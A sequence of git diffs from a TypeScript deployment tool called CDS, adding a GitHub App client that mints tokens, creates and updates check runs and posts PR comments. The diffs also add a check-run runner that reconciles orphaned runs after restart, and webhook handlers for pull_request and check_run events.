-      // Skip branches that are mid-deploy right now — their finalize()
-      // will fire normally and shouldn't be preempted.
-      if (entry.status === 'building' || entry.status === 'starting') continue;
+      // DON'T skip building/starting statuses — those are EXACTLY the
+      // ones we need to reconcile. reconcileOrphans is only called once
+      // at boot; at that moment no deploy is actually in flight in this
+      // process, so a "building" status can only be a leftover from the
+      // crash/restart that stranded this check run.
+      // (An earlier version skipped these, which defeated the whole
+      // purpose. Caught by Cursor Bugbot review on #450.)
       const parsed = this.parseRepo(repoFullName);
       if (!parsed) continue;
       try {

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -1,0 +1,163 @@
+/**
+ * CheckRunRunner — thin helper that bridges CDS deploys and GitHub
+ * check-run API calls.
+ *
+ * The branch deploy route calls `ensureOpen()` at the start of a build and
+ * `finalize()` when the build ends. Both are best-effort: any failure is
+ * logged but does NOT crash the deploy — GitHub connectivity problems
+ * shouldn't block a CDS preview going live.
+ *
+ * All check-run calls skip silently when:
+ *   - The GitHub App isn't configured (no client passed in)
+ *   - The branch isn't linked to a GitHub repo (no githubRepoFullName)
+ *   - The branch has no commit SHA (no githubCommitSha)
+ *
+ * Configuration and state mutations happen via StateService so the
+ * check-run id survives restarts and concurrent requests see a consistent
+ * view.
+ */
+
+import type { StateService } from './state.js';
+import type { GitHubAppClient } from './github-app-client.js';
+import type { BranchEntry, CdsConfig } from '../types.js';
+
+export interface CheckRunRunnerDeps {
+  stateService: StateService;
+  githubApp?: GitHubAppClient;
+  config: CdsConfig;
+}
+
+export class CheckRunRunner {
+  constructor(private readonly deps: CheckRunRunnerDeps) {}
+
+  private get enabled(): boolean {
+    return Boolean(this.deps.githubApp);
+  }
+
+  /**
+   * Build the `details_url` linking GitHub's "Details" button back to
+   * this branch's deploy panel. Falls back to a stable "branch list"
+   * path when publicBaseUrl isn't set (dev-only install).
+   */
+  private buildDetailsUrl(branchId: string): string {
+    const base = this.deps.config.publicBaseUrl?.replace(/\/$/, '') || `http://localhost:${this.deps.config.masterPort}`;
+    return `${base}/branch-panel?id=${encodeURIComponent(branchId)}`;
+  }
+
+  /**
+   * Parse "owner/repo" from a repo full name. GitHub always uses one slash
+   * separating exactly two segments so split+validate is adequate.
+   */
+  private parseRepo(fullName: string): { owner: string; repo: string } | null {
+    const parts = fullName.split('/');
+    if (parts.length !== 2 || !parts[0] || !parts[1]) return null;
+    return { owner: parts[0], repo: parts[1] };
+  }
+
+  /**
+   * Create (or reuse) an in-progress check run for a branch that's about
+   * to deploy. Updates `branch.githubCheckRunId` so the companion
+   * `finalize()` call can PATCH the right record.
+   *
+   * No-op when GitHub is disabled or the branch isn't linked. Best-effort —
+   * any HTTP or state error is swallowed after logging.
+   */
+  async ensureOpen(entry: BranchEntry): Promise<void> {
+    if (!this.enabled) return;
+    const repoFullName = entry.githubRepoFullName;
+    const headSha = entry.githubCommitSha;
+    const instId = entry.githubInstallationId;
+    if (!repoFullName || !headSha || !instId) return;
+    const parsed = this.parseRepo(repoFullName);
+    if (!parsed) return;
+
+    try {
+      const result = await this.deps.githubApp!.createCheckRun(
+        instId,
+        parsed.owner,
+        parsed.repo,
+        {
+          name: 'CDS Deploy',
+          headSha,
+          status: 'in_progress',
+          detailsUrl: this.buildDetailsUrl(entry.id),
+          externalId: entry.id,
+          startedAt: new Date().toISOString(),
+          output: {
+            title: 'Deploying to CDS…',
+            summary: `分支 \`${entry.branch}\` 正在构建部署,完成后会在此更新预览链接。`,
+          },
+        },
+      );
+      this.deps.stateService.updateBranchGithubMeta(entry.id, {
+        githubCheckRunId: result.id,
+      });
+      this.deps.stateService.save();
+    } catch (err) {
+      // eslint-disable-next-line no-console
+      console.warn(
+        `[check-run] createCheckRun failed for branch=${entry.id}:`,
+        (err as Error).message,
+      );
+    }
+  }
+
+  /**
+   * Close out the check run with the final status + a summary the user
+   * can read in GitHub's UI. No-op when no check-run was opened.
+   */
+  async finalize(entry: BranchEntry, opts: {
+    conclusion: 'success' | 'failure' | 'neutral' | 'cancelled';
+    summary: string;
+    previewUrl?: string;
+  }): Promise<void> {
+    if (!this.enabled) return;
+    const id = entry.githubCheckRunId;
+    const repoFullName = entry.githubRepoFullName;
+    const instId = entry.githubInstallationId;
+    if (!id || !repoFullName || !instId) return;
+    const parsed = this.parseRepo(repoFullName);
+    if (!parsed) return;
+
+    const title =
+      opts.conclusion === 'success'
+        ? 'Deploy successful'
+        : opts.conclusion === 'failure'
+        ? 'Deploy failed'
+        : opts.conclusion === 'cancelled'
+        ? 'Deploy cancelled'
+        : 'Deploy finished';
+    const summaryLines = [opts.summary];
+    if (opts.previewUrl) summaryLines.push('', `预览地址: ${opts.previewUrl}`);
+
+    try {
+      await this.deps.githubApp!.updateCheckRun(instId, parsed.owner, parsed.repo, id, {
+        status: 'completed',
+        conclusion: opts.conclusion,
+        completedAt: new Date().toISOString(),
+        detailsUrl: this.buildDetailsUrl(entry.id),
+        output: {
+          title,
+          summary: summaryLines.join('\n'),
+        },
+      });
+    } catch (err) {
+      // eslint-disable-next-line no-console
+      console.warn(
+        `[check-run] updateCheckRun failed for branch=${entry.id}:`,
+        (err as Error).message,
+      );
+    }
+  }
+
+  /**
+   * Derive the preview URL used in check-run summaries. Uses the first
+   * configured rootDomain / previewDomain like the rest of CDS. Returns
+   * undefined when no domain is configured.
+   */
+  derivePreviewUrl(entry: BranchEntry): string | undefined {
+    const host = this.deps.config.previewDomain || this.deps.config.rootDomains?.[0];
+    if (!host) return undefined;
+    return `https://${entry.id}.${host}`;
+  }
+}

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -231,4 +231,67 @@ export class CheckRunRunner {
     if (!host) return undefined;
     return `https://${entry.id}.${host}`;
   }
+
+  /**
+   * Reconcile orphan check-runs on CDS startup.
+   *
+   * Background: when CDS restarts mid-deploy (self-update / self-force-
+   * sync / crash), the deploy's check-run was set to `in_progress` but
+   * never got its `finalize()` PATCH, so GitHub keeps showing a yellow
+   * spinner forever. Every commit on the page ends up with "pending"
+   * status even though the branch has long since finished deploying
+   * (or errored out).
+   *
+   * At startup we walk every tracked branch and for each one that:
+   *   - has a `githubCheckRunId` stored, AND
+   *   - is NOT currently building/starting,
+   * we PATCH the check run to `conclusion: 'neutral'` with a short
+   * "superseded by restart" note. GitHub replaces the spinner with a
+   * grey neutral dot — accurate and no longer "stuck".
+   *
+   * Safe to call repeatedly; already-completed check-runs are no-ops
+   * on GitHub (PATCH of completed → completed is idempotent).
+   */
+  async reconcileOrphans(): Promise<void> {
+    if (!this.enabled) return;
+    const branches = this.deps.stateService.getAllBranches();
+    for (const entry of branches) {
+      const id = entry.githubCheckRunId;
+      const repoFullName = entry.githubRepoFullName;
+      const instId = entry.githubInstallationId;
+      if (!id || !repoFullName || !instId) continue;
+      // Skip branches that are mid-deploy right now — their finalize()
+      // will fire normally and shouldn't be preempted.
+      if (entry.status === 'building' || entry.status === 'starting') continue;
+      const parsed = this.parseRepo(repoFullName);
+      if (!parsed) continue;
+      try {
+        await this.deps.githubApp!.updateCheckRun(instId, parsed.owner, parsed.repo, id, {
+          status: 'completed',
+          conclusion: 'neutral',
+          completedAt: new Date().toISOString(),
+          detailsUrl: this.buildDetailsUrl(entry.id),
+          output: {
+            title: 'Deploy state unknown after CDS restart',
+            summary:
+              '此 check run 的 CDS 部署过程被 self-update / 重启打断,' +
+              '无法确认最终状态。已标记为 neutral 供展示参考,' +
+              `push 或 \`/cds redeploy\` 会触发一次干净的新部署。` +
+              (entry.status === 'running' ? '\n\n(当前分支: running 运行中)' : '') +
+              (entry.status === 'error' ? '\n\n(当前分支: error — 查看 CDS 日志)' : ''),
+          },
+        });
+        // Drop the stale id so next deploy creates a fresh check run
+        // instead of PATCHing this one to in_progress.
+        this.deps.stateService.updateBranchGithubMeta(entry.id, { githubCheckRunId: undefined });
+      } catch (err) {
+        // eslint-disable-next-line no-console
+        console.warn(
+          `[check-run] reconcileOrphans failed for branch=${entry.id}:`,
+          (err as Error).message,
+        );
+      }
+    }
+    try { this.deps.stateService.save(); } catch { /* best-effort */ }
+  }
 }

--- a/cds/src/services/github-app-client.ts
+++ b/cds/src/services/github-app-client.ts
@@ -1,0 +1,429 @@
+/**
+ * GitHubAppClient — talks to GitHub as a GitHub App (not an OAuth App).
+ *
+ * Unlike the existing GitHubOAuthClient (Device Flow for a single user),
+ * this client mints short-lived installation access tokens so the server
+ * can:
+ *   1. Verify incoming webhook HMAC signatures
+ *   2. Post / update "check runs" on commits — the panel Railway shows
+ *      in PRs under "Some checks were not successful" / "✅ Success"
+ *   3. List installations (repos the App has been granted access to)
+ *
+ * Zero new dependencies: JWT RS256 uses Node's built-in `crypto`, and
+ * HTTP calls use the global `fetch` already used elsewhere in CDS.
+ *
+ * Design notes:
+ * - Installation tokens last 1h. We cache them in-memory keyed by
+ *   installationId and re-mint when <60s remaining. Lost on restart —
+ *   acceptable because mint cost is ~1 HTTPS call.
+ * - All API calls are isolated behind the instance so tests can inject
+ *   a `fetchImpl`, same pattern as GitHubOAuthClient.
+ */
+
+import { createSign, createHmac, timingSafeEqual } from 'node:crypto';
+
+/** Minimal subset of the fetch API we rely on. Mirrors GitHubOAuthClient. */
+export type FetchLike = (url: string, init?: {
+  method?: string;
+  headers?: Record<string, string>;
+  body?: string;
+}) => Promise<{
+  ok: boolean;
+  status: number;
+  statusText: string;
+  json: () => Promise<any>;
+  text: () => Promise<string>;
+}>;
+
+export interface GitHubAppClientOptions {
+  /** Numeric GitHub App id (string so leading zeros survive env parsing). */
+  appId: string;
+  /** PEM-encoded RSA private key — real newlines, not `\n` escapes. */
+  privateKey: string;
+  /** Lowercase App slug — optional, only for the install URL helper. */
+  appSlug?: string;
+  /** Injection point for tests. Defaults to the global `fetch`. */
+  fetchImpl?: FetchLike;
+  /**
+   * Clock skew tolerance when verifying JWT-issued-at fields during tests.
+   * Production code pins to the system clock.
+   */
+  clockSkewSec?: number;
+}
+
+export interface CheckRunCreatePayload {
+  /** Display name, e.g. "CDS Deploy". Required. */
+  name: string;
+  /** Commit SHA the check belongs to. Required. */
+  headSha: string;
+  /** Lifecycle — defaults to 'in_progress' when omitted. */
+  status?: 'queued' | 'in_progress' | 'completed';
+  /** Set only with status='completed'. Defaults to 'success'. */
+  conclusion?: 'success' | 'failure' | 'neutral' | 'cancelled' | 'skipped' | 'timed_out' | 'action_required';
+  /** URL GitHub links to from the "Details" button. */
+  detailsUrl?: string;
+  /** ISO timestamp for started_at. Defaults to now. */
+  startedAt?: string;
+  /** ISO timestamp for completed_at. Only with status='completed'. */
+  completedAt?: string;
+  /** Free-form correlation id — CDS uses the branch id. */
+  externalId?: string;
+  output?: { title: string; summary: string };
+}
+
+export interface CheckRunUpdatePayload {
+  status?: 'queued' | 'in_progress' | 'completed';
+  conclusion?: 'success' | 'failure' | 'neutral' | 'cancelled' | 'skipped' | 'timed_out' | 'action_required';
+  detailsUrl?: string;
+  completedAt?: string;
+  output?: { title: string; summary: string };
+}
+
+export interface InstallationSummary {
+  id: number;
+  account: {
+    login: string;
+    type: string;
+    avatarUrl: string | null;
+  };
+  targetType: string;
+  repositorySelection: 'all' | 'selected';
+}
+
+export interface InstallationRepoSummary {
+  id: number;
+  name: string;
+  fullName: string;
+  private: boolean;
+  defaultBranch: string | null;
+  htmlUrl: string;
+}
+
+interface TokenCacheEntry {
+  token: string;
+  /** Epoch milliseconds when this token is no longer safe to use. */
+  expiresAtMs: number;
+}
+
+export class GitHubAppError extends Error {
+  constructor(public code: string, message: string, public status?: number) {
+    super(message);
+    this.name = 'GitHubAppError';
+  }
+}
+
+export class GitHubAppClient {
+  private readonly appId: string;
+  private readonly privateKey: string;
+  readonly appSlug: string | undefined;
+  private readonly fetchImpl: FetchLike;
+  private readonly tokenCache = new Map<number, TokenCacheEntry>();
+
+  constructor(opts: GitHubAppClientOptions) {
+    this.appId = opts.appId;
+    this.privateKey = opts.privateKey;
+    this.appSlug = opts.appSlug;
+    this.fetchImpl = opts.fetchImpl || (globalThis.fetch as unknown as FetchLike);
+  }
+
+  /**
+   * Sign a fresh App JWT. Valid for ≤10 minutes per GitHub's spec; we use
+   * 9 minutes to stay under the limit with clock skew.
+   *
+   * The `iat` is backdated 30s to tolerate clock drift on the GitHub side
+   * (documented workaround in GitHub's own examples).
+   */
+  generateAppJwt(nowSec = Math.floor(Date.now() / 1000)): string {
+    const header = { alg: 'RS256', typ: 'JWT' };
+    const payload = {
+      iat: nowSec - 30,
+      exp: nowSec + 9 * 60,
+      iss: this.appId,
+    };
+    const headerB64 = base64urlJson(header);
+    const payloadB64 = base64urlJson(payload);
+    const signingInput = `${headerB64}.${payloadB64}`;
+    const signer = createSign('RSA-SHA256');
+    signer.update(signingInput);
+    signer.end();
+    const signature = signer.sign(this.privateKey);
+    const signatureB64 = base64url(signature);
+    return `${signingInput}.${signatureB64}`;
+  }
+
+  /**
+   * Mint (or reuse a cached) installation access token. Tokens live an hour
+   * on GitHub's side; we refresh when <60s remain.
+   */
+  async getInstallationToken(installationId: number): Promise<string> {
+    const cached = this.tokenCache.get(installationId);
+    if (cached && cached.expiresAtMs - Date.now() > 60_000) {
+      return cached.token;
+    }
+    const jwt = this.generateAppJwt();
+    const res = await this.fetchImpl(
+      `https://api.github.com/app/installations/${installationId}/access_tokens`,
+      {
+        method: 'POST',
+        headers: {
+          Authorization: `Bearer ${jwt}`,
+          Accept: 'application/vnd.github+json',
+          'X-GitHub-Api-Version': '2022-11-28',
+          'User-Agent': 'CDS-GitHubApp/1.0',
+        },
+      },
+    );
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'installation_token_failed',
+        `Failed to mint installation token (HTTP ${res.status}): ${text.slice(0, 200)}`,
+        res.status,
+      );
+    }
+    const body = (await res.json()) as { token: string; expires_at: string };
+    const entry: TokenCacheEntry = {
+      token: body.token,
+      expiresAtMs: new Date(body.expires_at).getTime(),
+    };
+    this.tokenCache.set(installationId, entry);
+    return entry.token;
+  }
+
+  /** Drop a cached token — call after a 401 so the next request re-mints. */
+  invalidateTokenCache(installationId: number): void {
+    this.tokenCache.delete(installationId);
+  }
+
+  /**
+   * Create a check run on a commit. Returns the numeric id so the caller
+   * can PATCH it later via `updateCheckRun`.
+   *
+   * Errors here don't crash the deploy — the caller treats them as "best
+   * effort" so a CDS outage of GitHub connectivity doesn't block a deploy.
+   */
+  async createCheckRun(
+    installationId: number,
+    owner: string,
+    repo: string,
+    payload: CheckRunCreatePayload,
+  ): Promise<{ id: number; htmlUrl: string }> {
+    const token = await this.getInstallationToken(installationId);
+    const body: Record<string, unknown> = {
+      name: payload.name,
+      head_sha: payload.headSha,
+      status: payload.status || 'in_progress',
+    };
+    if (payload.conclusion) body.conclusion = payload.conclusion;
+    if (payload.detailsUrl) body.details_url = payload.detailsUrl;
+    if (payload.startedAt) body.started_at = payload.startedAt;
+    if (payload.completedAt) body.completed_at = payload.completedAt;
+    if (payload.externalId) body.external_id = payload.externalId;
+    if (payload.output) body.output = payload.output;
+
+    const url = `https://api.github.com/repos/${owner}/${repo}/check-runs`;
+    const res = await this.fetchImpl(url, {
+      method: 'POST',
+      headers: {
+        Authorization: `token ${token}`,
+        Accept: 'application/vnd.github+json',
+        'X-GitHub-Api-Version': '2022-11-28',
+        'User-Agent': 'CDS-GitHubApp/1.0',
+        'Content-Type': 'application/json',
+      },
+      body: JSON.stringify(body),
+    });
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'create_check_run_failed',
+        `POST /check-runs failed (HTTP ${res.status}): ${text.slice(0, 300)}`,
+        res.status,
+      );
+    }
+    const json = (await res.json()) as { id: number; html_url: string };
+    return { id: json.id, htmlUrl: json.html_url };
+  }
+
+  /**
+   * Patch an existing check run. Typically used to move from 'in_progress'
+   * to 'completed' with a conclusion + summary.
+   */
+  async updateCheckRun(
+    installationId: number,
+    owner: string,
+    repo: string,
+    checkRunId: number,
+    payload: CheckRunUpdatePayload,
+  ): Promise<void> {
+    const token = await this.getInstallationToken(installationId);
+    const body: Record<string, unknown> = {};
+    if (payload.status) body.status = payload.status;
+    if (payload.conclusion) body.conclusion = payload.conclusion;
+    if (payload.detailsUrl) body.details_url = payload.detailsUrl;
+    if (payload.completedAt) body.completed_at = payload.completedAt;
+    if (payload.output) body.output = payload.output;
+
+    const url = `https://api.github.com/repos/${owner}/${repo}/check-runs/${checkRunId}`;
+    const res = await this.fetchImpl(url, {
+      method: 'PATCH',
+      headers: {
+        Authorization: `token ${token}`,
+        Accept: 'application/vnd.github+json',
+        'X-GitHub-Api-Version': '2022-11-28',
+        'User-Agent': 'CDS-GitHubApp/1.0',
+        'Content-Type': 'application/json',
+      },
+      body: JSON.stringify(body),
+    });
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'update_check_run_failed',
+        `PATCH /check-runs/${checkRunId} failed (HTTP ${res.status}): ${text.slice(0, 300)}`,
+        res.status,
+      );
+    }
+  }
+
+  /**
+   * List every installation of this App. Used by the Settings UI so the
+   * operator can associate a project with one of the App's install
+   * targets (their user or org).
+   */
+  async listInstallations(): Promise<InstallationSummary[]> {
+    const jwt = this.generateAppJwt();
+    const res = await this.fetchImpl('https://api.github.com/app/installations?per_page=100', {
+      method: 'GET',
+      headers: {
+        Authorization: `Bearer ${jwt}`,
+        Accept: 'application/vnd.github+json',
+        'X-GitHub-Api-Version': '2022-11-28',
+        'User-Agent': 'CDS-GitHubApp/1.0',
+      },
+    });
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'list_installations_failed',
+        `GET /app/installations failed (HTTP ${res.status}): ${text.slice(0, 200)}`,
+        res.status,
+      );
+    }
+    const json = (await res.json()) as Array<{
+      id: number;
+      account: { login: string; type: string; avatar_url: string } | null;
+      target_type: string;
+      repository_selection: 'all' | 'selected';
+    }>;
+    return json.map((inst) => ({
+      id: inst.id,
+      account: {
+        login: inst.account?.login || '(unknown)',
+        type: inst.account?.type || 'Unknown',
+        avatarUrl: inst.account?.avatar_url || null,
+      },
+      targetType: inst.target_type,
+      repositorySelection: inst.repository_selection,
+    }));
+  }
+
+  /**
+   * List repos accessible to a particular installation. Called after the
+   * user picks an installation so we can show them the repos available
+   * for linking to a CDS project.
+   */
+  async listInstallationRepos(installationId: number): Promise<InstallationRepoSummary[]> {
+    const token = await this.getInstallationToken(installationId);
+    const res = await this.fetchImpl(
+      'https://api.github.com/installation/repositories?per_page=100',
+      {
+        method: 'GET',
+        headers: {
+          Authorization: `token ${token}`,
+          Accept: 'application/vnd.github+json',
+          'X-GitHub-Api-Version': '2022-11-28',
+          'User-Agent': 'CDS-GitHubApp/1.0',
+        },
+      },
+    );
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'list_repos_failed',
+        `GET /installation/repositories failed (HTTP ${res.status}): ${text.slice(0, 200)}`,
+        res.status,
+      );
+    }
+    const json = (await res.json()) as {
+      repositories: Array<{
+        id: number;
+        name: string;
+        full_name: string;
+        private: boolean;
+        default_branch: string;
+        html_url: string;
+      }>;
+    };
+    return (json.repositories || []).map((r) => ({
+      id: r.id,
+      name: r.name,
+      fullName: r.full_name,
+      private: r.private,
+      defaultBranch: r.default_branch || null,
+      htmlUrl: r.html_url,
+    }));
+  }
+}
+
+/**
+ * Verify a webhook signature. GitHub signs the raw request body with
+ * `HMAC-SHA256(secret, body)` and sends the hex digest as
+ * `X-Hub-Signature-256: sha256=<hex>`. Use a constant-time compare so
+ * an attacker can't deduce the secret via timing attacks.
+ *
+ * Returns true on match, false on any kind of mismatch (including a
+ * missing header or incorrect prefix). Does NOT throw — let the route
+ * map `false` to a 401 so signature failures stay out of observability.
+ */
+export function verifyWebhookSignature(
+  rawBody: Buffer,
+  signatureHeader: string | undefined,
+  secret: string,
+): boolean {
+  if (!signatureHeader || !signatureHeader.startsWith('sha256=')) return false;
+  const providedHex = signatureHeader.slice('sha256='.length).trim();
+  if (providedHex.length !== 64) return false;
+  const hmac = createHmac('sha256', secret);
+  hmac.update(rawBody);
+  const expectedHex = hmac.digest('hex');
+  // timingSafeEqual requires equal-length buffers.
+  const expected = Buffer.from(expectedHex, 'hex');
+  let provided: Buffer;
+  try {
+    provided = Buffer.from(providedHex, 'hex');
+  } catch {
+    return false;
+  }
+  if (provided.length !== expected.length) return false;
+  return timingSafeEqual(provided, expected);
+}
+
+/** Build the install-URL an operator clicks to grant the App access. */
+export function buildInstallUrl(appSlug: string | undefined, state?: string): string | null {
+  if (!appSlug) return null;
+  const base = `https://github.com/apps/${encodeURIComponent(appSlug)}/installations/new`;
+  return state ? `${base}?state=${encodeURIComponent(state)}` : base;
+}
+
+function base64url(buf: Buffer): string {
+  return buf
+    .toString('base64')
+    .replace(/=+$/, '')
+    .replace(/\+/g, '-')
+    .replace(/\//g, '_');
+}
+
+function base64urlJson(obj: unknown): string {
+  return base64url(Buffer.from(JSON.stringify(obj), 'utf-8'));
+}

--- a/cds/src/services/github-app-client.ts
+++ b/cds/src/services/github-app-client.ts
@@ -76,7 +76,16 @@ export interface CheckRunUpdatePayload {
   conclusion?: 'success' | 'failure' | 'neutral' | 'cancelled' | 'skipped' | 'timed_out' | 'action_required';
   detailsUrl?: string;
   completedAt?: string;
-  output?: { title: string; summary: string };
+  output?: {
+    title: string;
+    summary: string;
+    /**
+     * Optional markdown body shown under "Show more" in GitHub's check-run
+     * panel. Useful for embedding deploy log tails on failure. Capped at
+     * 65535 chars by GitHub; callers should trim before passing.
+     */
+    text?: string;
+  };
 }
 
 export interface InstallationSummary {
@@ -281,6 +290,84 @@ export class GitHubAppClient {
       throw new GitHubAppError(
         'update_check_run_failed',
         `PATCH /check-runs/${checkRunId} failed (HTTP ${res.status}): ${text.slice(0, 300)}`,
+        res.status,
+      );
+    }
+  }
+
+  /**
+   * Post a comment to a PR (or issue). PR comments go through the issues
+   * API — `POST /repos/:owner/:repo/issues/:number/comments`. Used for
+   * the Railway-style "preview URL on PR open" bot comment.
+   *
+   * Returns the comment id + HTML url so callers can cache it and edit
+   * later (e.g. update the preview URL when the slug changes).
+   */
+  async createIssueComment(
+    installationId: number,
+    owner: string,
+    repo: string,
+    issueNumber: number,
+    body: string,
+  ): Promise<{ id: number; htmlUrl: string }> {
+    const token = await this.getInstallationToken(installationId);
+    const res = await this.fetchImpl(
+      `https://api.github.com/repos/${owner}/${repo}/issues/${issueNumber}/comments`,
+      {
+        method: 'POST',
+        headers: {
+          Authorization: `token ${token}`,
+          Accept: 'application/vnd.github+json',
+          'X-GitHub-Api-Version': '2022-11-28',
+          'User-Agent': 'CDS-GitHubApp/1.0',
+          'Content-Type': 'application/json',
+        },
+        body: JSON.stringify({ body }),
+      },
+    );
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'create_comment_failed',
+        `POST /issues/${issueNumber}/comments failed (HTTP ${res.status}): ${text.slice(0, 300)}`,
+        res.status,
+      );
+    }
+    const json = (await res.json()) as { id: number; html_url: string };
+    return { id: json.id, htmlUrl: json.html_url };
+  }
+
+  /**
+   * Update an existing issue/PR comment. Used to refresh the preview-URL
+   * bot comment when a subsequent push changes the preview state.
+   */
+  async updateIssueComment(
+    installationId: number,
+    owner: string,
+    repo: string,
+    commentId: number,
+    body: string,
+  ): Promise<void> {
+    const token = await this.getInstallationToken(installationId);
+    const res = await this.fetchImpl(
+      `https://api.github.com/repos/${owner}/${repo}/issues/comments/${commentId}`,
+      {
+        method: 'PATCH',
+        headers: {
+          Authorization: `token ${token}`,
+          Accept: 'application/vnd.github+json',
+          'X-GitHub-Api-Version': '2022-11-28',
+          'User-Agent': 'CDS-GitHubApp/1.0',
+          'Content-Type': 'application/json',
+        },
+        body: JSON.stringify({ body }),
+      },
+    );
+    if (!res.ok) {
+      const text = await res.text().catch(() => '');
+      throw new GitHubAppError(
+        'update_comment_failed',
+        `PATCH /issues/comments/${commentId} failed (HTTP ${res.status}): ${text.slice(0, 300)}`,
         res.status,
       );
     }

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -729,7 +729,14 @@ export class GitHubWebhookDispatcher {
     if (!branchId) return { action: 'ignored-event', message: 'check_run missing external_id' };
     const entry = this.deps.stateService.getBranch(branchId);
     if (!entry) return { action: 'ignored-event', message: `check_run branch '${branchId}' not found` };
-    const commitSha = event.check_run!.head_sha;
+    const commitSha = event.check_run?.head_sha;
+    // SHA format validation — parallel to handlePush (defense-in-depth).
+    // Bugbot #450 round 6 pointed out that handleCheckRun was missing
+    // this check, and unvalidated SHA would get persisted + .slice()'d
+    // later (throwing on undefined / malformed input).
+    if (typeof commitSha !== 'string' || !/^[0-9a-f]{7,40}$/i.test(commitSha)) {
+      return { action: 'ignored-event', message: 'check_run has malformed or missing head_sha' };
+    }
     if (!dryRun) {
       this.deps.stateService.updateBranchGithubMeta(branchId, { githubCommitSha: commitSha });
       this.deps.stateService.save();

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -37,7 +37,9 @@ export interface WebhookDispatchResult {
     | 'branch-created'
     | 'branch-refreshed'
     | 'installation-acknowledged'
-    | 'check-run-requeued';
+    | 'check-run-requeued'
+    | 'pr-comment-posted'
+    | 'pr-branch-stopped';
   /** Short human message for the response + logs. */
   message: string;
   /** Populated when a branch was touched. */
@@ -46,6 +48,14 @@ export interface WebhookDispatchResult {
   deployRequest?: {
     branchId: string;
     commitSha: string;
+  };
+  /**
+   * Populated on `pull_request.closed` to ask the route to tear down the
+   * preview containers. Separate from deployRequest so the route decides
+   * between "deploy" and "stop".
+   */
+  stopRequest?: {
+    branchId: string;
   };
 }
 
@@ -90,6 +100,22 @@ export interface GitHubCheckRunEvent {
   installation?: { id: number };
 }
 
+export interface GitHubPullRequestEvent {
+  action: 'opened' | 'closed' | 'reopened' | 'synchronize' | 'edited' | 'ready_for_review' | string;
+  number: number;
+  pull_request?: {
+    number: number;
+    state: 'open' | 'closed';
+    merged?: boolean;
+    head: { ref: string; sha: string };
+    base: { ref: string };
+    html_url: string;
+    title: string;
+  };
+  repository?: { full_name: string };
+  installation?: { id: number };
+}
+
 export interface WebhookDispatcherDeps {
   stateService: StateService;
   worktreeService: WorktreeService;
@@ -118,9 +144,75 @@ export class GitHubWebhookDispatcher {
         return this.handleInstallationRepos(payload as GitHubInstallationReposEvent);
       case 'check_run':
         return this.handleCheckRun(payload as GitHubCheckRunEvent);
+      case 'pull_request':
+        return this.handlePullRequest(payload as GitHubPullRequestEvent);
       default:
         return { action: 'ignored-event', message: `Unhandled event type '${eventName}'` };
     }
+  }
+
+  /**
+   * Handle `pull_request` events. The three actions we care about:
+   *   - `opened` / `reopened`: remember the PR number on the branch so
+   *     later deploys can refresh the preview-URL bot comment. The actual
+   *     comment is posted by the route layer (it has the GitHubAppClient).
+   *   - `closed` (merged or not): flag the branch so the route can stop
+   *     its containers — saves resources and declutters the dashboard.
+   *   - `synchronize`: already covered by the accompanying `push` event,
+   *     so we no-op here.
+   *
+   * All other actions (edited / labeled / assigned / review_requested /
+   * ready_for_review / etc.) are acknowledged but don't trigger anything.
+   */
+  private async handlePullRequest(event: GitHubPullRequestEvent): Promise<WebhookDispatchResult> {
+    if (!event.pull_request || !event.repository) {
+      return { action: 'ignored-event', message: 'pull_request missing pull_request/repository' };
+    }
+    const repoFullName = event.repository.full_name;
+    const project = this.deps.stateService.findProjectByRepoFullName(repoFullName);
+    if (!project) {
+      return { action: 'ignored-no-project', message: `No project linked to ${repoFullName}` };
+    }
+
+    const branchName = event.pull_request.head.ref;
+    const slugified = StateServiceClass.slugify(branchName);
+    const branchId = project.legacyFlag ? slugified : `${project.slug}-${slugified}`;
+    const entry = this.deps.stateService.getBranch(branchId);
+
+    // `closed` action — tear down preview containers.
+    if (event.action === 'closed') {
+      if (!entry) {
+        return { action: 'ignored-event', message: `PR closed but branch '${branchId}' not in CDS` };
+      }
+      return {
+        action: 'pr-branch-stopped',
+        message: `PR #${event.pull_request.number} ${event.pull_request.merged ? 'merged' : 'closed'}; stopping preview`,
+        branchId,
+        stopRequest: { branchId },
+      };
+    }
+
+    // `opened` / `reopened` — stash the PR number on the branch so the
+    // route-layer comment poster has it, and let the push handler (which
+    // already runs in parallel from synchronize) drive the deploy.
+    if (event.action === 'opened' || event.action === 'reopened') {
+      if (entry) {
+        this.deps.stateService.updateBranchGithubMeta(branchId, {
+          githubPrNumber: event.pull_request.number,
+          githubInstallationId: project.githubInstallationId ?? event.installation?.id,
+          githubRepoFullName: repoFullName,
+        });
+        this.deps.stateService.save();
+      }
+      return {
+        action: 'pr-comment-posted',
+        message: `PR #${event.pull_request.number} ${event.action}; marked branch '${branchId}' for comment`,
+        branchId,
+      };
+    }
+
+    // synchronize / edited / etc.
+    return { action: 'ignored-event', message: `pull_request.${event.action} ignored` };
   }
 
   private async handlePush(event: GitHubPushEvent): Promise<WebhookDispatchResult> {

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -251,31 +251,59 @@ export class GitHubWebhookDispatcher {
    * The caller is responsible for HMAC verification — signatures that
    * don't match must be rejected BEFORE reaching this method.
    */
-  async handle(eventName: string, payload: unknown): Promise<WebhookDispatchResult> {
-    switch (eventName) {
-      case 'ping':
-        return { action: 'ignored-ping', message: 'pong' };
-      case 'push':
-        return this.handlePush(payload as GitHubPushEvent);
-      case 'installation':
-        return this.handleInstallation(payload as GitHubInstallationEvent);
-      case 'installation_repositories':
-        return this.handleInstallationRepos(payload as GitHubInstallationReposEvent);
